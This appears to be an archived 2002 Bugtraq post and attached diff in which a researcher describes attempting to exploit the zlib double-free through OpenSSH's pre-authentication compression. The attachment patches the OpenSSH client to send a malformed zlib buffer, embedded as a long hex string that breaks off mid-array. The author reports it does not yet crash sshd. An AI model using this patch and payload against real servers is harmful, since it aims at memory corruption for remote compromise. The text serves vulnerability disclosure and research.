8131454 2002-03-12 03:57 -0600 /42 rader/ H D Moore <sflist@digitaloffense.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-12 23:17 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <21373>
Ärende: exploiting the zlib bug in openssh
------------------------------------------------------------
From: H D Moore <sflist@digitaloffense.net>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Message-ID: <20020312095407.25654.qmail@securityfocus.com>
A bug was found in the zlib compression library which causes
inflateEnd() to incorrectly free the same chunk of memory twice when
given a deformed chunk of compressed data. A PNG image was
discovered (not by me) which triggers this flaw, it is attached.
OpenSSH uses the zlib library to compress data when the -C option is
passed to it. With version 2 of the protocol, it is possible to send
compressed/encrypted messages to the remote daemon before having to
authenticate (just after key exchange). This is done using
SSH2_MSG_IGNORE packets in the kex2() function of sshconnect2.c.
The attached patch to libpng-1.2.1 causes pngtest to dump out the
contents of the buffer it passes to inflate(). This is used with the
attached PNG file to obtain the buffer the OpenSSH client needs to
send. The buffer size has been tweaked in libpng to match the one
used in OpenSSH-3.1p1 (4096 bytes). The pngtest program will SEGV
after dumping out this buffer from the PNG file.
I patched the OpenSSH client to send this corrupt zlib buffer after
the key exchange, the inflate() call on the remote end is returning
the correct value indicating that the buffer did what it was
supposed to (Z_MEM_ERR or -4), but the remote daemon is NOT crashing
during the fatal_cleanup() and inflateEnd() calls. Taking the same
buffer and sticking it into the inflate() call of another
application causes the desired SEGV and possible path to
exploitability, so why isn't OpenSSH crashing?
The attached patch applies to OpenSSH-3.1p1, if you run the daemon
code it will spit out the recieved buffer (to make sure it made it
across ok) and some other debugging information. The recommended
command line to test this:
# ./sshd -d -d -d
# ./ssh -2 -C -v -v -v root@127.0.0.1
If for some reason you can't access the attachments, you can find
copies of them on my web site at the following URL:
http://www.digitaloffense.net/openssh_zlib/
(8131454) /H D Moore <sflist@digitaloffense.net>/(Ombruten)
Bilaga (text/x-diff) i text 8131455
Bilaga (image/png) i text 8131456
Bilaga (text/x-diff) i text 8131457
Kommentar i text 8132209 av Michael Leo <mleo@cariboulake.com>
8131455 2002-03-12 03:57 -0600 /362 rader/ H D Moore <sflist@digitaloffense.net>
Bilagans filnamn: "ssh_zlib.diff"
Importerad: 2002-03-12 23:17 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <21374>
Bilaga (text/plain) till text 8131454
Ärende: Bilaga (ssh_zlib.diff) till: exploiting the zlib bug in openssh
------------------------------------------------------------
diff -u -r openssh-3.1p1/compress.c openssh-3.1p1-zlib/compress.c
--- openssh-3.1p1/compress.c Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/compress.c Tue Mar 12 03:33:03 2002
@@ -24,11 +24,277 @@
static int compress_init_send_called = 0;
static int compress_init_recv_called = 0;
+
+unsigned char *boomij =
+"\x78\xda\xed\x99\x5d\x6c\x1c\x57\x15\xc7\x7f\x77\x76\x76\x77\xd6\xf1"
+"\xc6\xde\xc6\x4e\x76\x63\x37\x8e\x93\xd6\xa4\xa1\x7d\x88\x42\x91\xf2"
+"\xd0\x22\x54\x44\x41\xa8\xa0\x56\x54\xad\xe8\x87\xa2\xd2\xa8\xbc\xa0"
+"\xf2\x51\x09\x41\x79\xaa\x68\xa5\x82\xe0\x11\x29\x95\x10\x42\x42\x20"
+"\x8a\x04\x52\x1f\x88\xaa\x3e\x10\x11\xd1\xa0\x14\x54\x62\x27\xb5\xf3"
+"\xb9\x89\xbf\xbf\xe2\xd9\x5d\xdb\x3b\x77\x77\x66\xee\xe5\x61\xef\xec"
+"\x8e\x37\x4e\xb2\x11\x2a\xaa\x44\xae\x75\x35\xb3\xe3\x99\x3b\xe7\x7f"
+"\xce\x0b\x9c\xfb\xbf\x77\xe0\x4e\xbb\xd3\xee\xb4\x3b\xed\x4e\xfb\x7f"
+"\x6e\xe2\x13\x6e\x93\xfe\xa4\x00\x10\xb7\x30\xa8\x13\x3b\xf4\xff\x12"
+"\x80\xe8\xc0\x78\xbd\xc9\x7d\xe2\x06\x86\xeb\x1b\x81\xb0\x3f\x26\xc3"
+"\x45\x07\x0e\xda\xcc\x78\xb1\x09\x85\xf4\xcd\x40\x74\x04\xe0\x77\xdf"
+"\xf9\xa6\x52\x4a\xa3\xb5\x22\x54\x21\xf5\x40\x51\x57\x0a\x85\x40\x08"
+"\x0b\x61\x09\x84\x48\xa0\xcd\x5f\x18\x28\xae\x79\x1e\x4a\xc0\x36\x27"
+"\x43\x22\x99\x22\x61\xdb\x24\xec\x04\x09\xcb\x42\xfb\x75\xfc\x5a\x0d"
+"\xdf\xf7\x09\x94\x42\x69\x4d\x18\x2a\xfc\x20\xa4\x2a\x3d\xdc\xaa\x44"
+"\xa9\x90\x1e\x3b\x01\xc0\xcf\x8f\x1d\x77\x00\x65\xfa\x06\x10\x1d\x01"
+"\x08\x42\x05\x1a\x42\xad\x09\x02\x45\x18\x2a\xf6\x7f\xe3\x88\xc8\x65"
+"\x73\x38\xdd\x4e\xa3\xdb\x0e\x32\x90\x48\x29\x41\x36\x9e\xfb\xc1\xcb"
+"\x2f\xe9\x4f\xef\xe8\xe3\xf9\xd7\x5e\x15\x8e\xe3\x98\xc1\x5a\xe3\x4a"
+"\x29\x5b\x3f\x4a\x25\xe8\xed\x05\xe0\x95\x23\x2f\x68\xb4\xcf\xca\x6c"
+"\xb0\x33\x34\xe7\x2a\x0e\xc0\xea\x08\x80\xd2\xf8\x61\x48\x18\x86\x28"
+"\xad\xc4\xd0\x13\xcf\x89\x7c\x3e\xcf\xea\xea\x2a\xa1\x08\x63\x37\x36"
+"\xba\x0c\x24\x32\x90\xe4\xef\xd9\x27\x5c\x4f\x36\x8d\x2e\x9d\x38\x79"
+"\x7d\xec\x03\xe0\x42\x91\xb9\xb7\xdf\xc6\x31\x80\xbe\xfa\xdc\x61\xe1"
+"\x85\x8a\xd5\xd4\x16\x91\xca\x6d\xe3\x73\x87\x0e\x75\x99\x27\xac\x58"
+"\xbf\x0d\x00\x61\x48\xa0\x42\x7c\x15\x72\xf7\xd7\x9f\xa3\x50\x28\x90"
+"\x4a\xa5\x28\x5e\x29\x52\xaf\xd4\x91\x52\xb6\xbc\x1f\xb4\x80\x00\xd4"
+"\x03\xd5\xf2\xfa\x9a\x44\x96\x4a\x94\x4e\x9e\x44\xce\x97\x1a\x5e\x07"
+"\xe4\xdd\x05\x88\xa2\x61\xee\xfd\xf2\x63\x5f\x13\x03\xdb\xfb\xf5\x6b"
+"\x47\x7f\x2d\x56\x56\x57\x1f\x36\x00\x6c\x20\x11\xb7\xed\xb6\x00\x7c"
+"\xea\xe9\x23\x62\x68\xc7\x10\xb6\x6d\x13\x86\x21\x6e\xc5\x65\x7e\x79"
+"\xbe\x65\xa0\x39\x46\x11\x68\x66\xaa\x03\xf2\x83\x0f\xa1\xdb\x41\x5e"
+"\x18\x47\xce\xcf\x23\x8b\xe3\x94\xc6\xc6\x37\xd0\x29\x72\x04\xc0\x70"
+"\x10\xf0\xf8\x17\xbe\x24\x5e\x3c\x7c\x98\xfe\xee\xee\x87\x8c\xf1\x5d"
+"\xc0\x16\x20\x1d\xd9\xde\x51\x0e\xf8\x4a\xa1\x94\x22\x93\xcc\x70\x79"
+"\xf2\x32\x95\x95\x0a\xee\xaa\x4b\xad\x56\xa3\x5e\xad\x6f\xf0\xb8\x0c"
+"\x24\x8e\xed\xc4\xca\x88\x86\x00\x9c\x07\x0f\xe0\x04\x0d\x43\x9d\x07"
+"\x1a\xf7\x3b\x51\x1e\xd8\x90\x7b\xfc\x49\xa4\xd3\xc8\xa5\x6e\xcf\x63"
+"\x8b\xeb\x32\x7d\xfc\x38\x9f\xd9\xda\xad\x7f\xf4\xce\x3b\xbf\x00\x72"
+"\x06\x80\x06\x96\x81\x6b\x80\xdf\x09\x00\xe1\x87\x0d\x00\x4c\x15\xd9"
+"\x02\x64\xb4\x47\x8f\xed\xe0\x75\x69\xb2\xeb\xeb\xc8\x0b\xe3\xe0\x38"
+"\xc6\x83\x40\x20\xf1\x22\x00\x5a\x21\xa7\x8a\x26\x37\xda\x12\x97\xd6"
+"\xbd\x19\x40\x5e\x90\x78\xbe\x4f\xff\xec\x2c\x6b\xd5\x2a\xcb\xf3\xf3"
+"\x9c\x29\x2d\x01\x6c\x05\x0a\xc0\x5d\x80\x6f\x02\x5b\xb9\x15\x80\x66"
+"\x4d\xf6\x83\x10\xa5\x43\x7a\x1f\x38\x40\x6f\xe4\xdc\xb8\x1d\x0e\x0d"
+"\xaf\x4b\x89\x3b\x37\xc7\xc4\x99\x09\x76\xef\xdb\xdd\x28\x19\x1a\x64"
+"\x36\xc7\x87\xe3\xe3\x1c\x78\xe0\x00\xbd\x06\x68\x14\x2d\x80\x9c\xa9"
+"\x60\x00\xb5\xbf\xbf\x4f\xe8\xfb\xac\x95\xcb\x8c\x97\x5d\xed\x35\xea"
+"\x4d\x01\xd8\x03\x64\x81\x55\x60\xce\x50\x48\x77\x14\x81\x40\x85\x84"
+"\xaa\x31\x92\x63\x3b\x0d\xe2\x39\xa6\xe2\x44\x1e\x35\x23\x4d\x9c\x99"
+"\x40\x2e\x7d\x40\xee\xfe\x3c\x47\x8f\x1e\xe5\x1f\xef\xfd\x59\xfc\xf5"
+"\xed\xb7\x38\x75\xea\x4f\x04\xcf\xfc\x8c\x07\x0f\x3d\xd8\xa0\x91\xd3"
+"\xa2\x99\x0c\x24\x9e\xe7\x61\xcf\xcf\xa3\x2a\x65\x56\xaf\x5d\x63\x71"
+"\x75\x95\x29\x15\x50\xf7\x03\x80\x01\x43\x21\x80\x2a\x50\x06\xea\x37"
+"\xcb\x81\xf8\xac\x68\xd5\xc3\x10\xa5\x8c\xd1\xb1\x92\x19\x79\x2d\x5e"
+"\xd3\x77\xef\xdb\xcd\x84\x94\x14\xa7\x25\xaf\x3f\xf6\x18\xd9\x7a\x55"
+"\x3f\xfb\xf2\xf7\xc5\x62\xa2\x07\xcf\xf3\x28\x5f\x2b\x93\x4e\xa7\x5b"
+"\xcf\x46\x05\xa0\x56\x23\xbc\x70\x01\xcf\x75\x71\x5d\x97\x4a\xa1\x80"
+"\x5c\x9e\x17\xeb\x9e\xd4\xc0\x4e\xc3\xb2\x65\xe3\x7d\x37\x7a\xd2\xea"
+"\x40\x1a\x08\x3f\x50\x04\x4a\x35\x93\x33\xaa\x18\xf1\xe4\x8d\xae\x17"
+"\x72\x05\xf6\xed\xdb\x87\x94\x92\x9d\x3b\x77\xa2\xb4\x46\x59\x8a\xed"
+"\x77\x6d\xe7\x72\xf1\x32\xd3\xd3\xd3\x1b\x9c\xe0\xf9\x1e\x9e\xef\x11"
+"\x8e\x8d\x22\x2c\x8b\xf2\xc2\x02\x15\xcb\x42\x6e\xdb\xc6\xba\xac\xeb"
+"\xf5\x5a\x1d\xa0\xcf\x4c\x64\xae\x01\xe1\x45\xf4\xb6\x3b\xd1\x35\x81"
+"\xd6\x02\xad\x5b\xbc\x95\x6d\x62\x24\x56\x46\xa5\x94\xe4\x72\xb9\x66"
+"\x44\x02\x15\x8a\x33\xff\x3c\xc3\xb9\xe2\x39\x76\xee\xd8\x89\x6d\xdb"
+"\xb8\xae\xbb\x21\x99\x53\xcb\x8b\x74\xcb\x1a\xa5\xa9\x29\x4a\xe5\x32"
+"\x0b\x85\x02\x0b\x73\x73\xac\x4b\x49\xad\xee\x0b\x33\xfb\x96\x81\x05"
+"\x93\x03\xb7\x94\x12\x22\x36\x4f\x58\x4a\x6b\xad\x1b\x39\x20\xe2\xd4"
+"\x71\x6c\xa7\x65\xbc\xdd\xba\xee\xf9\x1e\xbd\x7d\x0d\x59\x60\x09\xa1"
+"\x0b\x85\x82\xe8\xeb\xef\x63\xff\x7d\xfb\x11\x49\x81\x08\x05\x9e\xef"
+"\x91\xc9\x64\xf0\x16\x16\x48\xcb\x2a\x9e\x94\xb8\x8b\x8b\x5c\x11\x82"
+"\xf3\x2b\x2b\x8d\x12\xed\xfb\x08\x21\x34\x50\x02\x66\x81\xc5\x88\xfb"
+"\x9d\x68\xa1\x66\x1e\x84\xa1\x6a\xd4\x73\x33\x17\x36\x75\x8f\xa9\xf9"
+"\x32\x68\xd0\xc9\xb1\x1d\x5c\xcf\x6d\xfe\x06\x48\x58\x16\xf7\xde\x7b"
+"\x2f\xe9\x2d\x69\x12\x89\x44\x23\x4a\xa1\x24\x93\xcc\xb0\x52\x59\xc1"
+"\x99\x98\x20\xd5\xdb\xcb\x54\xb1\x88\x5b\xa9\x30\x8e\x60\xd5\xf3\x48"
+"\x26\x93\xd8\x09\x8b\x64\xd2\x06\x98\x32\xdc\x97\x31\x19\x2e\x3a\xcd"
+"\x01\x2b\x54\x9a\x50\xe9\xd6\x04\xe5\x5c\x2f\xc8\xa2\xff\x95\x96\x4b"
+"\x4c\xfc\x7b\x82\xd2\x72\x29\x8a\x00\xe5\xf5\x32\xa3\xa3\xa3\x78\x9e"
+"\xd7\x00\x67\x37\xa2\xd4\x3d\xb5\x40\x2e\x9f\x67\xf1\xec\x59\xdc\x95"
+"\x15\x4e\x7b\x92\x52\xbd\x8e\x6d\xdb\xf4\xf4\xf4\xd0\xdd\x95\x21\x9b"
+"\xc9\x60\x3c\xef\xb5\x1b\x7f\x2b\x00\xcd\x9b\x42\xad\xd0\x4a\x37\x3c"
+"\xee\x38\x2d\xd1\x16\x4d\xfd\x31\x01\x77\xe5\xca\x15\xe4\xd2\x07\xec"
+"\xe8\xd1\xbc\xf9\xe6\x9b\x3c\xfb\xd2\x8b\xe2\xc4\xb1\x3f\xf2\xce\xaf"
+"\xbe\xcb\xe9\xd3\xa7\x49\xa7\xd3\x0d\xde\x4b\x49\x4f\x3a\xc9\xca\xa5"
+"\x4b\x2c\x4d\x4e\x32\x5b\xa9\x70\x51\x58\x64\xb7\x66\x19\x18\x18\xa0"
+"\x50\x28\xb0\xc5\xc9\x88\x74\x32\x85\x31\x3e\xb2\x37\xbe\xd6\x10\x76"
+"\x67\xab\x29\x8d\x16\xe2\x3a\xc5\x19\xe7\x3f\x80\xe7\x79\xe4\xf3\x79"
+"\x46\x2b\x43\xfc\xeb\xdc\x0c\x3f\xf9\xed\x0b\x6c\xf7\xd6\xf5\x53\xcf"
+"\x7f\x4b\xf4\x6c\x09\xf0\x3d\x9f\xc9\xcb\x93\xa4\x52\x29\xb6\x16\x2f"
+"\xa2\xb6\x66\x59\x98\x98\xe0\x5a\xa9\xc4\x29\xdf\xc7\x4a\x67\xc8\xf5"
+"\xe4\x18\x1c\x1c\x44\x08\x81\x65\x59\x5a\x58\x62\x03\x1b\x62\x47\xeb"
+"\x46\x11\xd0\xed\xe7\x02\x81\x40\x6f\xd0\x38\x04\x34\xa9\x10\x07\xd3"
+"\xdb\xdb\xcb\xde\x81\xbd\xac\xad\xad\xe1\xa4\xd3\x58\x35\x9f\xe5\xe5"
+"\x65\xd6\xec\x21\x4a\xe5\x12\x3a\xad\xc9\xcc\x4f\x93\x1b\x1c\xe0\xea"
+"\xfb\xef\x53\x29\x97\xb9\xb8\xb6\x4e\x29\x91\xa0\xaf\xbf\x8f\x91\x91"
+"\x11\xf2\xf9\x3c\x89\x44\x02\xcb\x42\x88\xcd\x0b\x4b\x73\x49\x6a\xdf"
+"\x62\x11\xad\xa3\x33\xad\x75\x6b\xf2\xb1\xc1\xe9\x6e\x48\x82\x4c\x83"
+"\xa3\x2d\x05\xea\xc0\xb6\x6d\xdb\xa8\xab\x3a\x3d\xe7\xcf\x53\xad\xd7"
+"\xb9\x7a\xf5\x2a\xca\x52\xec\xdc\xbd\x93\x7c\x60\xe1\x9e\x3d\xcb\x74"
+"\x2a\x45\x79\x61\x81\xb9\x95\x15\xce\x02\xd9\xee\x2c\xc3\x43\xc3\x0c"
+"\x0e\x0c\x12\xe8\x00\x21\x04\x5a\xa3\x8d\x09\x89\x98\xd7\x6f\x99\x03"
+"\xed\x8b\x70\xdd\x98\x03\xb4\x68\x1a\x6f\x54\xa3\xe3\x38\xad\xf3\x78"
+"\xef\x76\xd8\x7d\xcf\x6e\xba\xba\xba\x48\x25\x6d\xf6\xdd\xbf\x8f\x83"
+"\x9f\x3d\xc8\xc8\xd0\x10\xf5\x8b\xe7\x79\xf8\xd5\x57\xa9\x7b\x1e\x4b"
+"\xae\xcb\x44\x10\x62\x6d\xe9\x26\xbf\x23\xcf\xc0\xc0\x00\xe9\x54\x1a"
+"\x11\xf9\x5d\x8b\x38\x1f\xac\x58\x12\x5b\x37\xcb\x81\xeb\xa2\xa0\x85"
+"\x46\x6b\xb4\x63\x3b\xa2\xa1\xe3\x24\x4e\xb7\xd3\x28\x6a\x41\xe3\x37"
+"\x40\x2e\x9b\x6b\x46\x29\x93\xcc\x60\xdb\x36\x49\xdb\x66\xef\xd0\x5e"
+"\x72\xb9\x1c\x0b\x27\xfe\x4a\xdf\xf0\x30\xc7\xdf\x78\x83\x5d\x8f\x3c"
+"\xc2\x47\xee\x0a\x33\x57\xae\xd2\xdf\xdb\xcb\x9e\x3d\x7b\xc8\xe5\x72"
+"\x58\x56\xcb\xa7\x09\xd1\xf4\xa7\x68\x03\xa1\x6f\x36\x13\xeb\xf6\x64"
+"\xd6\x5a\xa3\xf4\xc6\x1d\x86\x48\x8c\x49\x29\x37\x48\x0c\x02\x03\xc4"
+"\x94\x57\xad\x35\x99\x4c\x86\xd5\xd9\x19\x7a\xb3\x59\xe6\x47\x47\x99"
+"\x3e\x77\x8e\x33\x63\x63\x1c\xaf\xfb\x64\xb3\x59\x86\x76\x0d\x31\x38"
+"\x30\x48\xba\x2b\x4d\x6d\xbd\xd6\xa2\x82\x40\xc4\xec\x51\x9b\xed\x4e"
+"\x74\x12\x01\xa5\xb5\x16\x81\x52\x7c\xef\x99\x27\xf5\xc8\x43\x8f\xdc"
+"\xee\x5e\x92\xf8\xe9\x8f\x5f\xe1\xe9\x43\x0f\x91\xef\xef\x67\x7a\x74"
+"\x94\x25\xd7\x65\x54\x6b\x96\xc3\x90\xac\x9d\xa0\x5a\xab\x32\x35\x3b"
+"\x85\x35\xbf\x91\xd1\x8d\x49\x58\x08\xa3\x83\xc2\xd8\xae\x04\x9d\x68"
+"\xa1\x26\xfb\x94\x42\xaf\xfb\x8a\x72\xdd\xe7\xc4\xbb\xc7\x74\xdb\x5b"
+"\x88\x6a\x45\x93\xba\x5a\x10\x6a\x85\x63\x27\xb8\xab\xcb\x61\x6b\x2a"
+"\xcd\xae\xe1\x61\x31\x79\xea\x14\x4b\xae\xcb\x54\x75\x5d\x7f\x54\xf5"
+"\xf0\x03\x9f\xb0\xba\xc6\x25\x6f\x9d\xa9\xf1\xb3\x80\x6e\x6c\x1c\x28"
+"\x05\x08\x72\x09\x11\xf1\x20\xf2\x7e\xd8\xb6\xbd\x72\x43\x00\x11\xc7"
+"\x34\xa0\x84\xb8\xc9\x64\x27\x84\xc6\x84\x3a\x16\x6f\x21\x04\x3a\x7a"
+"\xfb\xe7\x47\xee\x63\xa5\x58\x64\xf2\xc2\x05\x26\xab\xeb\x7a\xc2\x49"
+"\x93\xf4\x7d\x12\x09\x21\xd2\xa9\xa4\xb6\x13\x96\x68\x2b\xdf\x02\xb4"
+"\xd6\x2d\xfa\x47\xba\x37\x1e\x09\xdd\x49\x04\x34\xc0\x5b\xef\x1e\xcf"
+"\x02\x3d\xc0\x0e\x60\xd0\x1c\xb7\x9a\xc5\xb5\x0d\x24\x4d\xa9\xb3\x63"
+"\x65\xce\x07\xaa\x5f\xdc\xbf\x7f\xfb\x9e\x27\x46\xbe\xfd\xd1\x7b\xef"
+"\x31\x3e\x37\x77\xf9\x97\x63\x63\xef\x02\xdb\x80\x5e\xf3\x9e\xb2\x11"
+"\x6b\x9e\x31\x2e\x5a\xb0\x5c\x03\x96\xcc\xd2\x31\x30\xe3\xc5\x81\xa8"
+"\x4e\x56\x64\xda\xdc\x18\x00\xeb\x66\xc0\xba\x39\x76\x01\x29\x63\x7c"
+"\x74\x8c\xb6\x3d\x12\x91\x03\x8e\x3c\xfa\xe8\x0b\x33\x63\x63\x4c\xce"
+"\xcc\x94\x8e\x15\x8b\xbf\x31\xe3\x45\x12\x39\x34\x12\x79\xda\x08\xb5"
+"\x30\x02\x6e\x7a\xc5\x00\x93\xe6\x7a\x3d\x06\x44\x75\x12\x81\xf8\x9c"
+"\x10\x95\x87\x3a\xb0\x16\x33\x3c\xea\x51\x24\x22\x20\xd6\x53\x07\x0f"
+"\xde\x57\x9f\x9b\x1b\xbe\x34\x3b\xbb\xf2\xfb\xf1\xf1\x1f\x16\xd7\xd6"
+"\x6a\x66\x79\x18\x9a\x31\x2a\xc0\xa4\x51\x9a\x91\x58\xf3\x63\xdd\x33"
+"\xef\x93\x34\x8b\x76\xcb\xf8\xdb\x89\x40\xd4\x6a\x31\x2f\x45\x86\xc6"
+"\xa3\x60\xc7\x80\x58\x5f\x19\x19\x39\x5c\x29\x97\xf9\xdb\x95\x2b\xaf"
+"\x8f\x97\x4a\x33\xc6\xf8\x2e\x33\xe6\xaa\xd1\xf8\x33\xc0\x8a\x19\x33"
+"\xa2\x86\x1f\xa3\x4d\xdd\xbc\x37\xea\xb7\x4d\x21\xd1\x06\x24\x68\x03"
+"\xa7\x62\x2f\xb3\xe3\x7d\xbd\x52\x99\x1f\x9b\x99\xf9\xc3\x5f\x26\x27"
+"\x4f\x02\xdb\xcd\xba\xd6\x32\x9e\x5d\x04\xae\xc6\x74\xbe\x6a\x4b\xd2"
+"\x76\x10\x71\xfa\xe8\x96\x4e\xeb\x6c\xcb\x7c\xc3\x22\xdf\xf4\x44\x4c"
+"\xa3\xd8\xb1\xf3\x64\x6c\xfb\x2f\xba\xbe\x15\xd8\x65\xb6\x47\x32\x26"
+"\x9f\x26\x4d\x04\xd6\x8c\x31\x41\x5b\xb9\x8c\x7a\x10\x8b\x4e\xd0\x0e"
+"\xa0\x93\x6d\x15\xbd\xc9\xb9\x8e\xbd\xc8\x32\x83\x46\x00\x6a\x6d\xc2"
+"\xab\x2b\x96\xb4\xab\xa6\x00\xcc\x1b\xcf\x57\x8d\x71\xed\x33\x6d\x3c"
+"\xb2\xed\xe7\xfa\xb6\xb7\xd7\xdb\xf4\x87\x8a\xbd\xb0\xfd\xa3\x84\xb5"
+"\x49\xd4\x74\xac\xa2\x94\x4c\x79\x5c\x30\xd7\x54\x5b\x8e\xc5\x9b\xda"
+"\x64\x4b\x5d\xfd\xb7\x5f\x68\x74\x5b\x5e\xb4\x7f\x1a\x0a\x6f\xf0\x95"
+"\xc6\x8d\x51\x61\xc5\x50\x48\xdd\xe4\xd3\xd3\xcd\x8e\x1f\xfb\x37\xb2"
+"\xf6\x31\xad\x58\x79\x0d\x4c\x32\xea\x5b\x7c\xf4\xd3\x7c\xc2\x9a\x68"
+"\x5b\xcf\xde\xea\xc3\x5e\xc7\xed\x3f\x20\xc4\x9e\xae\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
